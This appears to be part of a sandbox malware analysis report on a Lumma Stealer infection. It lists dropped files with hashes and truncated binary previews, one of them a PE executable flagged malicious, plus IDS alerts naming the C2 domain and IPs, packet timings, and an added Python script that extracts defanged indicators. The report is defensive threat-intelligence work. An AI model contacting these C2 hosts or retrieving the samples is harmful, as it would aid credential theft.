                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\svchost.exe
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):1527814
                              Entropy (8bit):7.997329416439085
                              Encrypted:true
                              SSDEEP:24576:qytEI+7yp9uF1/WztSxaCdN28SdKriek4qcYjjBiiJWn8HBgvLGTrFX:qpI8Yk1/WBSkWN32KrzJq0ii8hgvLG1X
                              MD5:BB9EB573EAE8B10C74BCBFF43C81D5DB
                              SHA1:79D70041A7410F018169C265307E7E73515EDBB8
                              SHA-256:793BC2F7A3FE1FBE2E4E8960A8C9E42671842ABB38399EB96E2AD601E8733529
                              SHA-512:68E228C1DA9ADD467D3C3C354D9BF21C8387869A02647A8DC440FABC223294B354FA437E66A330A5CCBCC20E3614FCAD0BE595382BBE4FD88CABEFAC83F2F0E9
                              Malicious:false
                              Preview:PK........c5:YN+G)`O....+.....PrivacyDrive.exe.}.\TE...e..WvQPJT.,.0.44A]D...Y....n.%.b.J...i..a.S.Yi......J.ffij>V...4EC.;g........>....O.s..9s.3g..&M\..0........3._,......u.......[.,.n.M/...=#...#.{...f[".=..m})."F.M.xq.....m.....>..P.(..^...0y..,.....|.<.....Kg.v...?.p}?...N.M....8...k.............!,$....9..L.ns}...&Q.`.m.|..w..!k#Sa..2..`.w...a4@.PJ=H.....g...&...Mo...0K...iQ..~. SG2..f..........e.2..[6'.sL1.Y~....<.c...y(E......`..}..?ky.aN...}.~*C.........t(y.aj.............J}...>...._...j.i..df.&x..6E.Ld...s...7C.CW...D.?.3.fH9t...g..Ja.D....Q......>..4..B../xE....;..PZ...Tq~.#.fuKaL..C50.P...G..yA..<|.b..c.p.S4o..*.5..%..}g..@.-.........>.....:x..42......b..#..... mo........~.[{.M....%..m.t.E.%...PP..G....J.2...}...p.|....[J%c....{.N.....[...Nd.{..V..~uO.l.\.....W..93Ln.fA.... moDk.[.=..wk/...{..L.{...hS...x(.....A...pM...B.S...x...j.'..O.?..h.U.S.t...ZQc....%.|>62..G.Zcd...=...`U..z..`U.....O....af...a..+......[..@.h.....
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):2881672
                              Entropy (8bit):6.8419429623745796
                              Encrypted:false
                              SSDEEP:49152:MBjwz++TjZgdXCs6xTqVRoITZE87wajH/Qc9d1OF:yoz37p805cVO
                              MD5:80C2A36E9A14E3EDBA0B706D2433D9B8
                              SHA1:03AC191B235B3A867539720070A5E6CA1108B4F2
                              SHA-256:154DAE39845ABEF889AF814BD6AD84283374C90ECECE891ADDC362384AFDD882
                              SHA-512:AC030656796130A3949E66F537044A27630C43B5827DD252CFAB9C215E1B51DDD279F6F82911B1C728B19AC110B0A41D8D5CCEF32FEE97E07407B77B89728C8B
                              Malicious:true
                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......g..Y#...#...#...^...'...^.........4.>...........*.o."...e...'.......d...*.h.+...*.x.8...#.......^.........0."...#.|."...^.5."...Rich#...........................PE..L......]..........#..........<.......#....... ....@..........................P,.......,..................................................8............+..:...........'..8............................s..@............ ..p............................text...;........................... ..`.rdata...... ......................@..@.data....K..........................@....rsrc....8.......8..................@..@................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\svchost.exe
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):1527814
                              Entropy (8bit):7.997329416439085
                              Encrypted:true
                              SSDEEP:24576:qytEI+7yp9uF1/WztSxaCdN28SdKriek4qcYjjBiiJWn8HBgvLGTrFX:qpI8Yk1/WBSkWN32KrzJq0ii8hgvLG1X
                              MD5:BB9EB573EAE8B10C74BCBFF43C81D5DB
                              SHA1:79D70041A7410F018169C265307E7E73515EDBB8
                              SHA-256:793BC2F7A3FE1FBE2E4E8960A8C9E42671842ABB38399EB96E2AD601E8733529
                              SHA-512:68E228C1DA9ADD467D3C3C354D9BF21C8387869A02647A8DC440FABC223294B354FA437E66A330A5CCBCC20E3614FCAD0BE595382BBE4FD88CABEFAC83F2F0E9
                              Malicious:false
                              Preview:PK........c5:YN+G)`O....+.....PrivacyDrive.exe.}.\TE...e..WvQPJT.,.0.44A]D...Y....n.%.b.J...i..a.S.Yi......J.ffij>V...4EC.;g........>....O.s..9s.3g..&M\..0........3._,......u.......[.,.n.M/...=#...#.{...f[".=..m})."F.M.xq.....m.....>..P.(..^...0y..,.....|.<.....Kg.v...?.p}?...N.M....8...k.............!,$....9..L.ns}...&Q.`.m.|..w..!k#Sa..2..`.w...a4@.PJ=H.....g...&...Mo...0K...iQ..~. SG2..f..........e.2..[6'.sL1.Y~....<.c...y(E......`..}..?ky.aN...}.~*C.........t(y.aj.............J}...>...._...j.i..df.&x..6E.Ld...s...7C.CW...D.?.3.fH9t...g..Ja.D....Q......>..4..B../xE....;..PZ...Tq~.#.fuKaL..C50.P...G..yA..<|.b..c.p.S4o..*.5..%..}g..@.-.........>.....:x..42......b..#..... mo........~.[{.M....%..m.t.E.%...PP..G....J.2...}...p.|....[J%c....{.N.....[...Nd.{..V..~uO.l.\.....W..93Ln.fA.... moDk.[.=..wk/...{..L.{...hS...x(.....A...pM...B.S...x...j.'..O.?..h.U.S.t...ZQc....%.|>62..G.Zcd...=...`U..z..`U.....O....af...a..+......[..@.h.....
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):1835008
                              Entropy (8bit):4.46604440896113
                              Encrypted:false
                              SSDEEP:6144:AIXfpi67eLPU9skLmb0b4YWSPKaJG8nAgejZMMhA2gX4WABl0uNQdwBCswSb/:FXD94YWlLZMM6YFH6+/
                              MD5:3AD1381DB551FF94A284F5577A9FFD46
                              SHA1:6901AD5E24141C9124CA442E97EF2883D45A1319
                              SHA-256:711933BFA5C5D5A8B4B847E1CD7746DDB44C7D841208F77F82D60FDE2A0570E6
                              SHA-512:10D5D75872C6D07155CBB640F2877D31114093F66C1466F96C1FA6A30DECC9B858072E8EBF16928FD4AF102BC112B9F3A80436ED6CE59C93CD8C432E96BDFA55
                              Malicious:false
                              Preview:regf8...8....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm6.YL+................................................................................................................................................................................................................................................................................................................................................zNx........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              No static file info
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-26T17:46:47.842585+0200 | 2056078 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop) | 1 | 192.168.2.4 | 50546 | 1.1.1.1 | 53 | UDP
2024-09-26T17:46:48.357475+0200 | 2056079 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) | 1 | 192.168.2.4 | 49744 | 172.67.206.221 | 443 | TCP
2024-09-26T17:46:48.562552+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49744 | 172.67.206.221 | 443 | TCP
2024-09-26T17:46:48.562552+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49744 | 172.67.206.221 | 443 | TCP
2024-09-26T17:46:49.125919+0200 | 2056079 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) | 1 | 192.168.2.4 | 49745 | 172.67.206.221 | 443 | TCP
2024-09-26T17:46:49.598721+0200 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49745 | 172.67.206.221 | 443 | TCP
2024-09-26T17:46:49.598721+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49745 | 172.67.206.221 | 443 | TCP
2024-09-26T17:46:58.843588+0200 | 2056079 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) | 1 | 192.168.2.4 | 49748 | 172.67.206.221 | 443 | TCP
2024-09-26T17:46:59.100244+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49748 | 172.67.206.221 | 443 | TCP
2024-09-26T17:46:59.100244+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49748 | 172.67.206.221 | 443 | TCP
2024-09-26T17:46:59.804866+0200 | 2056079 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) | 1 | 192.168.2.4 | 49749 | 172.67.206.221 | 443 | TCP
2024-09-26T17:47:00.280736+0200 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49749 | 172.67.206.221 | 443 | TCP
2024-09-26T17:47:00.280736+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49749 | 172.67.206.221 | 443 | TCP
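To turn the IDS alert table above into reusable indicators, here is an added example in Python that is not part of the Joe Sandbox report. It parses the thirteen alert rows (transcribed inline in a pipe-delimited form chosen for this example), recovers the domain that the ET signature text carries with a defanging space ("racedsuitreow .shop"), keeps only TCP destinations as C2 hosts so the sandbox's DNS resolver 1.1.1.1 is not mistaken for one, and groups alerts per flow so the SNI, activity and check-in sequence on each connection is visible. The function names and the pipe layout are this example's own assumptions; the values are those shown in the table.

```python
import re
from collections import defaultdict

# Constructed input: the thirteen Suricata rows from the report's IDS alert table,
# transcribed as pipe-delimited text. Field order follows the table header:
# timestamp | SID | signature | severity | src IP | src port | dst IP | dst port | protocol
ALERT_ROWS = """\
2024-09-26T17:46:47.842585+0200 | 2056078 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop) | 1 | 192.168.2.4 | 50546 | 1.1.1.1 | 53 | UDP
2024-09-26T17:46:48.357475+0200 | 2056079 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) | 1 | 192.168.2.4 | 49744 | 172.67.206.221 | 443 | TCP
2024-09-26T17:46:48.562552+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49744 | 172.67.206.221 | 443 | TCP
2024-09-26T17:46:48.562552+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49744 | 172.67.206.221 | 443 | TCP
2024-09-26T17:46:49.125919+0200 | 2056079 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) | 1 | 192.168.2.4 | 49745 | 172.67.206.221 | 443 | TCP
2024-09-26T17:46:49.598721+0200 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49745 | 172.67.206.221 | 443 | TCP
2024-09-26T17:46:49.598721+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49745 | 172.67.206.221 | 443 | TCP
2024-09-26T17:46:58.843588+0200 | 2056079 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) | 1 | 192.168.2.4 | 49748 | 172.67.206.221 | 443 | TCP
2024-09-26T17:46:59.100244+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49748 | 172.67.206.221 | 443 | TCP
2024-09-26T17:46:59.100244+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49748 | 172.67.206.221 | 443 | TCP
2024-09-26T17:46:59.804866+0200 | 2056079 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) | 1 | 192.168.2.4 | 49749 | 172.67.206.221 | 443 | TCP
2024-09-26T17:47:00.280736+0200 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49749 | 172.67.206.221 | 443 | TCP
2024-09-26T17:47:00.280736+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49749 | 172.67.206.221 | 443 | TCP
"""

# The ET signature text writes the domain with a space before the TLD
# ("racedsuitreow .shop") so the rule name is not a live hostname; this
# pattern captures that spaced form from inside the parentheses.
DOMAIN_RE = re.compile(r"\(([A-Za-z0-9-]+(?:\s?\.[A-Za-z0-9-]+)+)")

CHECKIN_SID = 2054653  # "ET MALWARE Lumma Stealer CnC Host Checkin" in the table above


def parse_alerts(text):
    """Turn the pipe-delimited alert rows into dicts with typed ports and SIDs."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sig, sev, sip, sport, dip, dport, proto = (f.strip() for f in line.split("|"))
        alerts.append({
            "timestamp": ts, "sid": int(sid), "signature": sig, "severity": int(sev),
            "src_ip": sip, "src_port": int(sport), "dst_ip": dip, "dst_port": int(dport),
            "proto": proto,
        })
    return alerts


def domain_from_signature(signature):
    """Recover the domain named in a signature and return it defanged as name[.]tld."""
    m = DOMAIN_RE.search(signature)
    if not m:
        return None
    domain = m.group(1).replace(" ", "").lower()
    return domain.replace(".", "[.]")


def extract_iocs(alerts):
    """Collect C2 domains, C2 IPs, SIDs and the per-flow sequence of SIDs."""
    flows = defaultdict(list)
    iocs = {"domains": set(), "c2_ips": set(), "sids": set()}
    for a in alerts:
        iocs["sids"].add(a["sid"])
        domain = domain_from_signature(a["signature"])
        if domain:
            iocs["domains"].add(domain)
        # The UDP row's destination is the sandbox's DNS resolver, not the C2;
        # only TCP destinations are hosts the stealer actually talked to.
        if a["proto"] == "TCP":
            iocs["c2_ips"].add(a["dst_ip"])
        key = (a["src_ip"], a["src_port"], a["dst_ip"], a["dst_port"], a["proto"])
        flows[key].append(a["sid"])
    iocs["flows"] = dict(flows)
    return iocs


def checkin_flows(iocs):
    """Flows on which the CnC Host Checkin signature fired, in sorted order."""
    return sorted(k for k, sids in iocs["flows"].items() if CHECKIN_SID in sids)


if __name__ == "__main__":
    iocs = extract_iocs(parse_alerts(ALERT_ROWS))
    print("C2 domains:", sorted(iocs["domains"]))
    print("C2 IPs:    ", sorted(iocs["c2_ips"]))
    print("SIDs:      ", sorted(iocs["sids"]))
    for flow in checkin_flows(iocs):
        print("checkin flow", flow, "->", iocs["flows"][flow])
```

Run as a script it prints one domain, one C2 IP, five SIDs and four check-in flows (source ports 49744, 49745, 49748 and 49749), each showing the same pattern of SNI match followed by an activity rule and then the check-in rule. Against a live Suricata deployment the same functions apply to eve.json records once the field names are mapped; only `parse_alerts` would change.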
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 26, 2024 17:46:26.133271933 CEST | 49730 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:26.133320093 CEST | 443 | 49730 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:26.133402109 CEST | 49730 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:26.148433924 CEST | 49730 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:26.148463011 CEST | 443 | 49730 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:26.874216080 CEST | 443 | 49730 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:26.874294043 CEST | 49730 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:26.880234003 CEST | 49730 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:26.880258083 CEST | 443 | 49730 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:26.880548000 CEST | 443 | 49730 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:26.897711039 CEST | 49730 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:26.943399906 CEST | 443 | 49730 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:27.205738068 CEST | 443 | 49730 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:27.205805063 CEST | 443 | 49730 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:27.205977917 CEST | 49730 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:27.835746050 CEST | 49730 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:32.781773090 CEST | 49734 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:32.781814098 CEST | 443 | 49734 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:32.781892061 CEST | 49734 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:32.783739090 CEST | 49734 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:32.783752918 CEST | 443 | 49734 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:33.475622892 CEST | 443 | 49734 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:33.475719929 CEST | 49734 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:33.477072001 CEST | 49734 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:33.477085114 CEST | 443 | 49734 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:33.477652073 CEST | 443 | 49734 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:33.511109114 CEST | 49734 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:33.551407099 CEST | 443 | 49734 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:33.798062086 CEST | 443 | 49734 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:33.798208952 CEST | 443 | 49734 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:33.798288107 CEST | 49734 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:33.798314095 CEST | 49734 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:33.798335075 CEST | 443 | 49734 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:33.798351049 CEST | 49734 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:33.798356056 CEST | 443 | 49734 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:33.836759090 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:33.836812973 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:33.837129116 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:33.837359905 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:33.837376118 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:34.543016911 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:34.543791056 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:34.543843985 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:34.544644117 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:34.544651031 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:34.869179010 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:34.869215012 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:34.869375944 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:34.869402885 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:34.913038969 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:34.985510111 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:34.985527992 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:34.985595942 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:34.985647917 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:34.986011028 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:34.986077070 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:34.986228943 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:34.986290932 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.029356956 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.029449940 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.099680901 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.099776983 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.099976063 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.100044012 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.100096941 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.100152969 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.101902008 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.101982117 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.102020025 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.102077007 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.102931976 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.102996111 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.144184113 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.144263029 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.149956942 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.150059938 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.214416027 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.214519024 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.214528084 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.214541912 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.214590073 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.214721918 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.214787960 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.215585947 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.215657949 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.216135025 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.216193914 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.216408014 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.216454983 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.217120886 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.217180014 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.218302011 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.218374014 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.218509912 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.218571901 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.234797001 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.234884024 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.235363007 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.235424995 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.240596056 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.240664959 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.260103941 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.260162115 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.260413885 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
Sep 26, 2024 17:46:35.260471106 CEST | 49735 | 443 | 192.168.2.4 | 185.255.122.133
Sep 26, 2024 17:46:35.304991961 CEST | 443 | 49735 | 185.255.122.133 | 192.168.2.4
